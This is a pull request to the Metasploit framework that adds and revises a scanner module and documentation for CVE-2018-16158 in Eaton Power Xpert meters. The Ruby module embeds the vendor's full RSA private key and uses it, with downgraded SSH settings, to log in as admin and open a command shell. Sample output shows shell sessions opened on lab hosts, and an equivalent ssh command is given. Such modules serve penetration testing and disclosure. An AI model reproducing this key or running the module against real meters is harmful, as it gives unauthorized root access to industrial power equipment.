### PR TITLE
Scan module for eaton_xpert_backdoor CVE-2018-16158 

### DIFF
--- a/documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
+++ b/documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
@@ -1,0 +1,58 @@
+The eaton_xpert_backdoor module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.
+
+## Vulnerable Application
+
+  Eaton is a power management company with a wide range of power management products.
+  Power meters sold by Eaton used a firmware build process for many years that left a developer key pair in the default profile.
+  Specific models include: Power Xpert Meter 4000/6000/8000
+  
+
+## Verification Steps
+
+**Usage**
+```
+- [ ] Start `msfconsole`
+- [ ] `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
+- [ ] `set RHOSTS 192.168.135.155`
+- [ ] `run -z`
+- [ ] `Vulnerable hosts should present a shell`
+```
+
+**Example output**
+```
+[+] 192.168.135.155:22 - Logged in as admin
+[*] Command shell session 1 opened (192.168.135.1:62063 -> 192.168.135.155:22) at 2018-08-31 19:12:21 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+- [ ] `sessions`
+```
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                                                      Connection
+  --  ----  ----   -----------                                                      ----------
+  1         basic   Eaton Xpert Meter SSH Backdoor (SSH-2.0-OpenSSH_7.7p1 Debian-4)  192.168.135.1:62063 -> 192.168.135.155:22 (192.168.135.155)
+
+```
+
+
+## Options
+
+  **Option name**
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOSTS                    yes       The target address range or CIDR identifier
+   RPORT    22               yes       The target port
+   THREADS  1                yes       The number of concurrent threads
+
+
+### Powermeter Firmware versions
+
+Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
+
+Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
+Tested on: Firmware 12.1.9.1 and 13.3.2.10

--- a/documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
+++ b/documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
@@ -1,58 +1,37 @@
-The eaton_xpert_backdoor module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.
+# Description
+  
+  The eaton_xpert_backdoor module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.
 
 ## Vulnerable Application
 
   Eaton is a power management company with a wide range of power management products.
   Power meters sold by Eaton used a firmware build process for many years that left a developer key pair in the default profile.
   Specific models include: Power Xpert Meter 4000/6000/8000
-  
+
+  Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
+
+  Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
+  Tested on: Firmware 12.1.9.1 and 13.3.2.10
+  Similar to running: `ssh -m hmac-sha1 -c aes128-cbc -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa  -i ./id_rsa admin@1.1.1.2`
 
 ## Verification Steps
 
-**Usage**
-```
-- [ ] Start `msfconsole`
-- [ ] `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
-- [ ] `set RHOSTS 192.168.135.155`
-- [ ] `run -z`
-- [ ] `Vulnerable hosts should present a shell`
-```
+  1. Start `msfconsole`
+  2. `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
+  3. `set RHOSTS 1.1.1.2`
+  4. `run -z`
+  5. `Vulnerable hosts should present a shell`
 
-**Example output**
+## Scenarios
+
 ```
+msf > use auxiliary/scanner/ssh/eaton_xpert_backdoor
+msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > set RHOSTS 1.1.1.2
+RHOSTS => 1.1.1.2
+msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > run -z
+
 [+] 192.168.135.155:22 - Logged in as admin
-[*] Command shell session 1 opened (192.168.135.1:62063 -> 192.168.135.155:22) at 2018-08-31 19:12:21 -0400
+[*] Command shell session 1 opened (1.1.1.1:62063 -> 1.1.1.2:22) at 2018-08-31 19:12:21 -0400
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-- [ ] `sessions`
-```
-
-Active sessions
-===============
-
-  Id  Name  Type   Information                                                      Connection
-  --  ----  ----   -----------                                                      ----------
-  1         basic   Eaton Xpert Meter SSH Backdoor (SSH-2.0-OpenSSH_7.7p1 Debian-4)  192.168.135.1:62063 -> 192.168.135.155:22 (192.168.135.155)
-
-```
-
-
-## Options
-
-  **Option name**
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   RHOSTS                    yes       The target address range or CIDR identifier
-   RPORT    22               yes       The target port
-   THREADS  1                yes       The number of concurrent threads
-
-
-### Powermeter Firmware versions
-
-Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
-
-Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
-Tested on: Firmware 12.1.9.1 and 13.3.2.10

--- a/documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
+++ b/documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
@@ -30,7 +30,7 @@ msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > set RHOSTS 1.1.1.2
 RHOSTS => 1.1.1.2
 msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > run -z
 
-[+] 192.168.135.155:22 - Logged in as admin
+[+] 1.1.1.2:22 - Logged in as admin
 [*] Command shell session 1 opened (1.1.1.1:62063 -> 1.1.1.2:22) at 2018-08-31 19:12:21 -0400
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed

--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -1,18 +1,7 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
-# Exploit Title: Eaton Xpert Meter SSH Private Key Exposure
-# Date: 07-16-2018
-# Exploit Author: BrianWGray
-# Contact: https://twitter.com/BrianWGray
-# WebPage: https://CTRLu.net/
-# Vendor Homepage: http://www.eaton.com/
-# Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
-# Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
-# Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
-# Recomended to update to Version 13.4.0.10 or above
-# Tested on: Firmware 12.1.9.1 and 13.3.2.10
-# CVE : CVE-2018-16158
-##
+# Current source: https://github.com/rapid7/metasploit-framework
+###
 
 # XXX: This shouldn't be necessary but is now
 require 'net/ssh/command_stream'
@@ -27,14 +16,12 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',
       'Description'    => %q{
-        Eaton Power Xpert Meters are used across industries for energy management,
-        monitoring circuit loading, and identifying power quality problems.
-        Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with
-        a public/private key pair on Power Xpert Meter hardware that allows
+        Eaton Power Xpert Meters running firmware 12.x.x.x or below version
+        13.3.x.x and below ship with a public/private key pairthat allows
         passwordless authentication to any other affected Power Xpert Meter.
-        The vendor recommends updating to Version 13.4.0.10 or above. As the key is
-        easily retrievable, an attacker can use it to gain unauthorized remote
-        access as uid0
+        The vendor recommends updating to Version 13.4.0.10 or above.
+        Tested on: Firmware 12.1.9.1 and 13.3.2.10. As the key is easily retrievable, 
+        an attacker can use it to gain unauthorized remote access as uid0
       },
       'Author'         => [
         'BrianWGray'
@@ -62,6 +49,7 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     factory = ssh_socket_factory
 
+    # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters.
     ssh_opts = {
       auth_methods:    ['publickey'],
       port:            rport,

--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
         'BrianWGray'
       ],
       'References'     => [
-        ['CVE', 'CVE-2018-16158'],
+        ['CVE', '2018-16158'],
         ['EDB', '45283'],
         ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
         ['URL', 'https://www.ctrlu.net/vuln/0006.html']

--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -1,0 +1,141 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Exploit Title: Eaton Xpert Meter SSH Private Key Exposure
+# Date: 07-16-2018
+# Exploit Author: BrianWGray
+# Contact: https://twitter.com/BrianWGray
+# WebPage: https://CTRLu.net/
+# Vendor Homepage: http://www.eaton.com/
+# Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
+# Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
+# Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
+# Recomended to update to Version 13.4.0.10 or above
+# Tested on: Firmware 12.1.9.1 and 13.3.2.10
+# CVE : CVE-2018-16158
+##
+
+# XXX: This shouldn't be necessary but is now
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SSH
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::CommandShell
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',
+      'Description'    => %q{
+        Eaton Power Xpert Meters are used across industries for energy management,
+        monitoring circuit loading, and identifying power quality problems.
+        Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with
+        a public/private key pair on Power Xpert Meter hardware that allows
+        passwordless authentication to any other affected Power Xpert Meter.
+        The vendor recommends updating to Version 13.4.0.10 or above. As the key is
+        easily retrievable, an attacker can use it to gain unauthorized remote
+        access as uid0
+      },
+      'Author'         => [
+        'BrianWGray'
+      ],
+      'References'     => [
+        ['CVE', 'CVE-2018-16158'],
+        ['EDB', '45283'],
+        ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
+        ['URL', 'https://www.ctrlu.net/vuln/0006.html']
+      ],
+      'DisclosureDate' => 'Jul 18 2018',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(22)
+    ])
+
+    register_advanced_options([
+      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),
+      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
+    ])
+  end
+
+  def run_host(ip)
+    factory = ssh_socket_factory
+
+    ssh_opts = {
+      auth_methods:    ['publickey'],
+      port:            rport,
+      key_data:        [ key_data ],
+      hmac:            ['hmac-sha1'],
+      encryption:      ['aes128-cbc'],
+      kex:             ['diffie-hellman-group1-sha1'],
+      host_key:        ['ssh-rsa'],
+      use_agent:       false,
+      config:          false,
+      proxy:           factory
+    }
+
+    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(ip, 'admin', ssh_opts)
+      end
+    rescue Net::SSH::Exception => e
+      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
+      return
+    end
+
+    return unless ssh
+
+    print_good("#{ip}:#{rport} - Logged in as admin")
+
+    version = ssh.transport.server_version.version
+
+    report_vuln(
+      host: ip,
+      name: self.name,
+      refs: self.references,
+      info: version
+    )
+
+    shell = Net::SSH::CommandStream.new(ssh)
+
+    return unless shell
+
+    info = "Eaton Xpert Meter SSH Backdoor (#{version})"
+
+    ds_merge = {
+      'USERNAME' => 'admin'
+    }
+
+    start_session(self, info, ds_merge, false, shell.lsock)
+
+    # XXX: Ruby segfaults if we don't remove the SSH socket
+    remove_socket(ssh.transport.socket)
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def key_data
+    <<EOF
+-----BEGIN RSA PRIVATE KEY-----
+MIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4Mj
+C15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDgl
+TyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKB
+gQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/
+c2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQP
+I3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2W
+gA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3
+YzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaB
+trQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZd
+O0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJf
+z54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+z
+zyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh
+7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA==
+-----END RSA PRIVATE KEY-----
+EOF
+  end
+end

--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
         13.3.x.x and below ship with a public/private key pairthat allows
         passwordless authentication to any other affected Power Xpert Meter.
         The vendor recommends updating to Version 13.4.0.10 or above.
-        Tested on: Firmware 12.1.9.1 and 13.3.2.10. As the key is easily retrievable, 
+        Tested on: Firmware 12.1.9.1 and 13.3.2.10. As the key is easily retrievable.
         an attacker can use it to gain unauthorized remote access as uid0
       },
       'Author'         => [

--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -16,12 +16,10 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',
       'Description'    => %q{
-        Eaton Power Xpert Meters running firmware 12.x.x.x or below version
-        13.3.x.x and below ship with a public/private key pairthat allows
-        passwordless authentication to any other affected Power Xpert Meter.
-        The vendor recommends updating to Version 13.4.0.10 or above.
-        Tested on: Firmware 12.1.9.1 and 13.3.2.10. As the key is easily retrievable.
-        an attacker can use it to gain unauthorized remote access as uid0
+        Eaton Power Xpert Meters running firmware below version 12.x.x.x or
+        below version 13.3.x.x ship with a public/private key pair that
+        facilitate remote administrative access to the devices.
+        Tested on: Firmware 12.1.9.1 and 13.3.2.10.
       },
       'Author'         => [
         'BrianWGray'


### PR DESCRIPTION
Module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.

**Usage**
- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
- [ ] `set RHOSTS 192.168.135.155`
- [ ] `run -z`

**Example output**
```
[+] 192.168.135.155:22 - Logged in as admin
[*] Command shell session 1 opened (192.168.135.1:62063 -> 192.168.135.155:22) at 2018-08-31 19:12:21 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- [ ] `sessions`
```

Active sessions
===============

  Id  Name  Type   Information                                                      Connection
  --  ----  ----   -----------                                                      ----------
  1         basic   Eaton Xpert Meter SSH Backdoor (SSH-2.0-OpenSSH_7.7p1 Debian-4)  192.168.135.1:62063 -> 192.168.135.155:22 (192.168.135.155)

```